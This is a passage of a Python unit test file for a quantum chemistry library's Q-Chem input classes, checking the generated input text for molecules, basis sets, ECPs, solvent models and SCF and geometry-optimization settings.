coords = [[0.000000, 0.000000, 0.000000],
[0.000000, 0.000000, 1.089000],
[1.026719, 0.000000, -0.363000],
[-0.513360, -0.889165, -0.363000],
[-0.513360, 0.889165, -0.363000]]
mol = Molecule(["C", "H", "H", "H", "Cl"], coords)
coords2 = [[0.0, 0.0, -2.4],
[0.0, 0.0, 0.0],
[0.0, 0.0, 2.4]]
heavy_mol = Molecule(["Br", "Cd", "Br"], coords2)
coords3 = [[2.632273, -0.313504, -0.750376],
[3.268182, -0.937310, -0.431464],
[2.184198, -0.753305, -1.469059]]
water_mol = Molecule(["O", "H", "H"], coords3)
class QcTaskTest(PymatgenTest):
def elementary_io_verify(self, text, qctask):
self.to_and_from_dict_verify(qctask)
self.from_string_verify(contents=text, ref_dict=qctask.as_dict())
def to_and_from_dict_verify(self, qctask):
"""
Helper function. This function should be called in each specific test.
"""
d1 = qctask.as_dict()
qc2 = QcTask.from_dict(d1)
d2 = qc2.as_dict()
self.assertEqual(d1, d2)
def from_string_verify(self, contents, ref_dict):
qctask = QcTask.from_string(contents)
d2 = qctask.as_dict()
self.assertEqual(ref_dict, d2)
def test_read_zmatrix(self):
contents = '''$moLEcule
1 2
S
C 1 1.726563
H 2 1.085845 1 119.580615
C 2 1.423404 1 114.230851 3 -180.000000 0
H 4 1.084884 2 122.286346 1 -180.000000 0
C 4 1.381259 2 112.717365 1 0.000000 0
H 6 1.084731 4 127.143779 2 -180.000000 0
C 6 1.415867 4 110.076147 2 0.000000 0
F 8 1.292591 6 124.884374 4 -180.000000 0
$end
$reM
BASIS = 6-31+G*
EXCHANGE = B3LYP
jobtype = freq
$end
'''
qctask = QcTask.from_string(contents)
ans = '''$molecule
1 2
S 0.00000000 0.00000000 0.00000000
C 0.00000000 0.00000000 1.72656300
H -0.94431813 0.00000000 2.26258784
C 1.29800105 -0.00000002 2.31074808
H 1.45002821 -0.00000002 3.38492732
C 2.30733813 -0.00000003 1.36781908
H 3.37622632 -0.00000005 1.55253338
C 1.75466906 -0.00000003 0.06427152
F 2.44231414 -0.00000004 -1.03023099
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31+g*
$end
'''
ans_tokens = ans.split('\n')
ans_text_part = ans_tokens[:2] + ans_tokens[11:]
ans_coords_part = ans_tokens[2:11]
converted_tokens = str(qctask).split('\n')
converted_text_part = converted_tokens[:2] + converted_tokens[11:]
converted_coords_part = converted_tokens[2:11]
self.assertEqual(ans_text_part, converted_text_part)
for ans_coords, converted_coords in zip(ans_coords_part,
converted_coords_part):
ans_coords_tokens = ans_coords.split()
converted_coords_tokens = converted_coords.split()
self.assertEqual(ans_coords_tokens[0], converted_coords_tokens[0])
xyz1 = ans_coords_tokens[1:]
xyz2 = converted_coords_tokens[1:]
for t1, t2 in zip(xyz1, xyz2):
self.assertTrue(abs(float(t1)-float(t2)) < 0.0001)
def test_no_mol(self):
ans = '''$comment
Test Methane
$end
$molecule
-1 2
read
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(molecule="READ", title="Test Methane",
exchange="B3LYP", jobtype="SP", charge=-1,
spin_multiplicity=2,
basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_simple_basis_str(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_fragmented_molecule(self):
mol1 = copy.deepcopy(mol)
mol1.set_charge_and_spin(1, 2)
mol2 = copy.deepcopy(water_mol)
mol2.set_charge_and_spin(-1, 2)
qctask = QcTask([mol1, mol2], title="Test Fragments", exchange="B3LYP",
jobtype="bsse", charge=0, spin_multiplicity=3, basis_set="6-31++G**")
ans = """$comment
Test Fragments
$end
$molecule
0 3
--
1 2
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
--
-1 2
O 2.63227300 -0.31350400 -0.75037600
H 3.26818200 -0.93731000 -0.43146400
H 2.18419800 -0.75330500 -1.46905900
$end
$rem
jobtype = bsse
exchange = b3lyp
basis = 6-31++g**
$end
"""
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_mixed_basis_str(self):
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set=[("C", "6-311G*"), ("H", "6-31g(d,p)"), ("H", "6-31g(d,p)"),
("H", "6-31g*"), ("cl", "6-31+g*")])
ans_mixed = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = mixed
$end
$basis
C 1
6-311g*
****
H 2
6-31g(d,p)
****
H 3
6-31g(d,p)
****
H 4
6-31g*
****
Cl 5
6-31+g*
****
$end
"""
self.assertEqual(ans_mixed, str(qctask))
self.elementary_io_verify(ans_mixed, qctask)
qctask.set_basis_set("6-31+G*")
ans_simple = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
"""
self.assertEqual(str(qctask), ans_simple)
qctask.set_basis_set([("C", "6-311G*"), ("H", "6-31g(d,p)"), ("H", "6-31g(d,p)"),
("H", "6-31g*"), ("cl", "6-31+g*")])
self.assertEqual(str(qctask), ans_mixed)
self.elementary_io_verify(ans_mixed, qctask)
def test_opt_constraint_str(self):
opt_coords = [[-1.8438708, 1.7639844, 0.0036111],
[-0.3186117, 1.7258535, 0.0241264],
[0.1990523, 0.2841796, -0.0277432],
[1.7243049, 0.2460376, -0.0067397],
[-2.1904881, 2.8181992, 0.0419217],
[-2.2554858, 1.2221552, 0.8817436],
[-2.2293542, 1.2964646, -0.9274861],
[0.0400963, 2.2185950, 0.9541706],
[0.0663274, 2.2929337, -0.8514870],
[-0.1594453, -0.2084377, -0.9579392],
[-0.1860888, -0.2830148, 0.8477023],
[2.1362687, 0.7881530, -0.8845274],
[2.0709344, -0.8081667, -0.0452220],
[2.1094213, 0.7132527, 0.9246668]]
opt_mol = Molecule(["C", "C", "C", "C", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H"], opt_coords)
constraint_dict = {'opt': [['tors', 1, 2, 3, 4, 180.0]]}
ans = """$molecule
0 1
C -1.84387080 1.76398440 0.00361110
C -0.31861170 1.72585350 0.02412640
C 0.19905230 0.28417960 -0.02774320
C 1.72430490 0.24603760 -0.00673970
H -2.19048810 2.81819920 0.04192170
H -2.25548580 1.22215520 0.88174360
H -2.22935420 1.29646460 -0.92748610
H 0.04009630 2.21859500 0.95417060
H 0.06632740 2.29293370 -0.85148700
H -0.15944530 -0.20843770 -0.95793920
H -0.18608880 -0.28301480 0.84770230
H 2.13626870 0.78815300 -0.88452740
H 2.07093440 -0.80816670 -0.04522200
H 2.10942130 0.71325270 0.92466680
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
$opt
CONSTRAINT
tors 1 2 3 4 180.0
ENDCONSTRAINT
$end
"""
qctask = QcTask(opt_mol, exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*",
optional_params=constraint_dict)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_partial_hessian(self):
qcinp1 = QcInput.from_file(os.path.join(test_dir, "partial_hessian.qcinp"))
ans = """$molecule
0 1
C -1.76827000 0.46495000 0.28695000
O 1.78497000 -0.42034000 -0.39845000
H -0.77736000 0.78961000 0.66548000
H -1.75896000 0.46604000 -0.82239000
H -2.54983000 1.16313000 0.65101000
H -1.98693000 -0.55892000 0.65381000
H 2.14698000 -0.07173000 0.45530000
H 1.25596000 -1.21510000 -0.13726000
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31g*
n_sol = 3
phess = true
$end
$alist
3
7
8
$end
"""
self.assertEqual(ans, str(qcinp1))
self.elementary_io_verify(ans, qcinp1.jobs[0])
qcinp1.jobs[0].params["rem"]["jobtype"] = "sp"
qcinp1.jobs[0].params["rem"]["phess"] = 3
qcinp1.jobs[0].set_partial_hessian_atoms([2, 3, 4, 5, 6])
ans = """$molecule
0 1
C -1.76827000 0.46495000 0.28695000
O 1.78497000 -0.42034000 -0.39845000
H -0.77736000 0.78961000 0.66548000
H -1.75896000 0.46604000 -0.82239000
H -2.54983000 1.16313000 0.65101000
H -1.98693000 -0.55892000 0.65381000
H 2.14698000 -0.07173000 0.45530000
H 1.25596000 -1.21510000 -0.13726000
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31g*
n_sol = 5
phess = True
$end
$alist
2
3
4
5
6
$end
"""
self.assertEqual(ans, str(qcinp1))
def test_basis2_mixed(self):
qcinp1 = QcInput.from_file(os.path.join(test_dir, "basis2_mixed.inp"))
ans = """$molecule
0 1
C -1.76827000 0.46495000 0.28695000
O 1.78497000 -0.42034000 -0.39845000
H -0.77736000 0.78961000 0.66548000
H -1.75896000 0.46604000 -0.82239000
H -2.54983000 1.16313000 0.65101000
H -1.98693000 -0.55892000 0.65381000
H 2.14698000 -0.07173000 0.45530000
H 1.25596000 -1.21510000 -0.13726000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = mixed
basis2 = basis2_mixed
purecart = 1111
$end
$basis
C 1
6-311+g(3df)
****
O 2
aug-cc-pvtz
****
H 3
6-31g*
****
H 4
6-31g*
****
H 5
6-31g*
****
H 6
6-31g*
****
H 7
cc-pvdz
****
H 8
cc-pvdz
****
$end
$basis2
C 1
sto-3g
****
O 2
sto-3g
****
H 3
sto-3g
****
H 4
sto-3g
****
H 5
sto-3g
****
H 6
sto-3g
****
H 7
sto-3g
****
H 8
sto-3g
****
$end
"""
self.assertEqual(str(qcinp1), ans)
self.elementary_io_verify(ans, qcinp1.jobs[0])
basis2 = qcinp1.jobs[0].params["basis2"]
qcinp2 = copy.deepcopy(qcinp1)
qcinp2.jobs[0].set_basis2("3-21g")
self.assertEqual(qcinp2.jobs[0].params["rem"]["basis2"], "3-21g")
self.assertFalse("basis2" in qcinp2.jobs[0].params)
qcinp2.jobs[0].set_basis2(basis2)
self.assertEqual(str(qcinp2), ans)
def test_aux_basis_str(self):
ans_gen = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = freq
exchange = xygjos
basis = gen
aux_basis = gen
$end
$aux_basis
C
rimp2-cc-pvdz
****
Cl
rimp2-aug-cc-pvdz
****
H
rimp2-cc-pvdz
****
$end
$basis
C
6-31g*
****
Cl
6-31+g*
****
H
6-31g*
****
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="xygjos",
jobtype="Freq",
basis_set={"C": "6-31G*", "h": "6-31g*",
"CL": "6-31+g*"},
aux_basis_set={"c": "rimp2-cc-pvdz",
"H": "rimp2-cc-pvdz",
"Cl": "rimp2-aug-cc-pvdz"})
self.assertEqual(str(qctask), ans_gen)
self.elementary_io_verify(ans_gen, qctask)
qctask.set_auxiliary_basis_set([("C", "aug-cc-pvdz"), ("H", "cc-pvdz"), ("H", "cc-pvdz"),
("H", "cc-pvdz"), ("cl", "rimp2-aug-cc-pvdz")])
ans_mixed_aux = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = freq
exchange = xygjos
basis = gen
aux_basis = mixed
$end
$aux_basis
C 1
aug-cc-pvdz
****
H 2
cc-pvdz
****
H 3
cc-pvdz
****
H 4
cc-pvdz
****
Cl 5
rimp2-aug-cc-pvdz
****
$end
$basis
C
6-31g*
****
Cl
6-31+g*
****
H
6-31g*
****
$end
"""
self.assertEqual(ans_mixed_aux, str(qctask))
self.elementary_io_verify(ans_mixed_aux, qctask)
qctask.set_basis_set("6-31+G*")
qctask.set_auxiliary_basis_set("rimp2-cc-pvdz")
ans_simple = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = freq
exchange = xygjos
basis = 6-31+g*
aux_basis = rimp2-cc-pvdz
$end
"""
self.assertEqual(ans_simple, str(qctask))
self.elementary_io_verify(ans_simple, qctask)
qctask.set_basis_set({"C": "6-31G*", "h": "6-31g*",
"CL": "6-31+g*"})
qctask.set_auxiliary_basis_set([("C", "aug-cc-pvdz"), ("H", "cc-pvdz"), ("H", "cc-pvdz"),
("H", "cc-pvdz"), ("cl", "rimp2-aug-cc-pvdz")])
self.assertEqual(ans_mixed_aux, str(qctask))
self.elementary_io_verify(ans_mixed_aux, qctask)
def test_ecp_str(self):
ans = '''$comment
Test ECP
$end
$molecule
0 1
Br 0.00000000 0.00000000 -2.40000000
Cd 0.00000000 0.00000000 0.00000000
Br 0.00000000 0.00000000 2.40000000
$end
$rem
jobtype = opt
exchange = b3lyp
basis = gen
ecp = gen
$end
$basis
Br
srlc
****
Cd
srsc
****
$end
$ecp
Br
srlc
****
Cd
srsc
****
$end
'''
qctask = QcTask(heavy_mol, title="Test ECP", exchange="B3LYP",
jobtype="Opt",
basis_set={"Br": "srlc", "Cd": "srsc"},
ecp={"Br": "SrlC", "Cd": "srsc"})
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_memory(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
mem_static = 500
mem_total = 18000
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_memory(total=18000, static=500)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_qc42_pcm_solvent_format(self):
text = '''$molecule
-1 2
N -0.00017869 0.00010707 0.20449990
H 0.89201838 0.20268122 -0.29656572
H -0.62191133 0.67135171 -0.29649162
H -0.26987729 -0.87406458 -0.29659779
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
theory ssvpe
vdwscale 1.1
$end
$pcm_solvent
dielectric 78.3553
$end
'''
qctask_qc41 = QcTask.from_string(text)
qctask_qc42 = copy.deepcopy(qctask_qc41)
solvent_params = qctask_qc42.params.pop("pcm_solvent")
qctask_qc42.params["solvent"] = solvent_params
ans = '''$molecule
-1 2
N -0.00017869 0.00010707 0.20449990
H 0.89201838 0.20268122 -0.29656572
H -0.62191133 0.67135171 -0.29649162
H -0.26987729 -0.87406458 -0.29659779
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
theory ssvpe
vdwscale 1.1
$end
$solvent
dielectric 78.3553
$end
'''
self.assertEqual(str(qctask_qc42), ans)
self.elementary_io_verify(ans, qctask_qc42)
def test_set_max_num_of_scratch_files(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
max_sub_file_num = 500
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_max_num_of_scratch_files(500)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_max_scf_iterations(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
max_scf_cycles = 100
scf_algorithm = diis_gdm
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_scf_algorithm_and_iterations(algorithm="diis_gdm",
iterations=100)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_scf_convergence_threshold(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
scf_convergence = 8
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_scf_convergence_threshold(exponent=8)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_integral_threshold(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
thresh = 14
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_integral_threshold(thresh=14)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_dft_grid(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
xc_grid = 000110000590
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_dft_grid(radical_points=110, angular_points=590)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_scf_initial_guess(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
scf_guess = gwh
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_scf_initial_guess("GWH")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_geom_opt_max_cycles(self):
ans = '''$comment
Test Methane
$end
$molecule
1 2
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_max_cycles = 100
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP", charge=1, spin_multiplicity=2,
basis_set="6-31+G*")
qctask.set_geom_max_iterations(100)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_geom_opt_coords_type(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_coords = 0
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_geom_opt_coords_type("cartesian")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_scale_geom_opt_threshold(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_tol_displacement = 120
geom_opt_tol_energy = 10
geom_opt_tol_gradient = 30
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.scale_geom_opt_threshold(gradient=0.1, displacement=0.1,
energy=0.1)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_geom_opt_use_gdiis(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_max_diis = -1
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_geom_opt_use_gdiis()
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_disable_symmetry(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
sym_ignore = True
symmetry = False
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.disable_symmetry()
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_use_cosmo(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_dielectric = 35.0
solvent_method = cosmo
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_cosmo(dielectric_constant=35.0)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_wrap_comment(self):
ans = '''$comment
5_2_2_methoxyethoxy_ethoxy_6_nitro_1_3_dihydro_2_1_3_benzothiadiazole
singlet neutral B3lYP/6-31+G* geometry optimization
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(mol, title=" 5_2_2_methoxyethoxy_ethoxy_6_nitro_1_3_dihydro_2_1_3_benzothiadiazole singlet "
"neutral B3lYP/6-31+G* geometry optimization", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
title = ''' MgBPh42 singlet neutral PBE-D3/6-31+G* geometry optimization
<SCF Fix Strategy>{
"current_method_id": 1,
"methods": [
"increase_iter",
"diis_gdm",
"gwh",
"rca",
"gdm",
"core+gdm"
]
}</SCF Fix Strategy>'''
ans = '''$comment
MgBPh42 singlet neutral PBE-D3/6-31+G* geometry optimization
<SCF Fix Strategy>{
"current_method_id": 1,
"methods": [
"increase_iter",
"diis_gdm",
"gwh",
"rca",
"gdm",
"core+gdm"
]
}</SCF Fix Strategy>
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(mol, title=title, exchange="B3LYP", jobtype="SP", basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
title = " 5_2_2_methoxyethoxy_ethoxy_6_nitro_1_3_dihydro_2_1_3_benzothiadiazole singlet neutral " \
"B3lYP/6-31+G* geometry optimization" + \
'''<SCF Fix Strategy>{
"current_method_id": 1,
"methods": [
"increase_iter",
"diis_gdm",
"gwh",
"rca",
"gdm",
"core+gdm"
]
}</SCF Fix Strategy>'''
qctask = QcTask(mol, title=title, exchange="B3LYP", jobtype="SP", basis_set="6-31+G*")
self.elementary_io_verify(str(qctask), qctask)
def test_use_pcm_qc41(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
radii uff
theory ssvpe
vdwscale 1.1
$end
$pcm_solvent
dielectric 78.3553
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm(solvent_key="pcm_solvent")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm(pcm_params={"Radii": "FF",
"Theory": "CPCM",
"SASrad": 1.5,
"HPoints": 1202},
solvent_params={"Dielectric": 20.0,
"Temperature": 300.75,
"NSolventAtoms": 2,
"SolventAtom": [[8, 1, 186, 1.30],
[1, 2, 187, 1.01]]},
radii_force_field="OPLSAA",
solvent_key="pcm_solvent")
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
force_fied = oplsaa
solvent_method = pcm
$end
$pcm
hpoints 1202
radii bondi
sasrad 1.5
theory cpcm
vdwscale 1.1
$end
$pcm_solvent
dielectric 20.0
nsolventatoms 2
solventatom 8 1 186 1.30
solventatom 1 2 187 1.01
temperature 300.75
$end
'''
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_use_pcm_qc42(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
radii uff
theory ssvpe
vdwscale 1.1
$end
$solvent
dielectric 78.3553
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm()
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm(pcm_params={"Radii": "FF",
"Theory": "CPCM",
"SASrad": 1.5,
"HPoints": 1202},
solvent_params={"Dielectric": 20.0,
"Temperature": 300.75,
"NSolventAtoms": 2,
"SolventAtom": [[8, 1, 186, 1.30],
[1, 2, 187, 1.01]]},
radii_force_field="OPLSAA")
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
force_fied = oplsaa
solvent_method = pcm
$end
$pcm
hpoints 1202
radii bondi
sasrad 1.5
theory cpcm
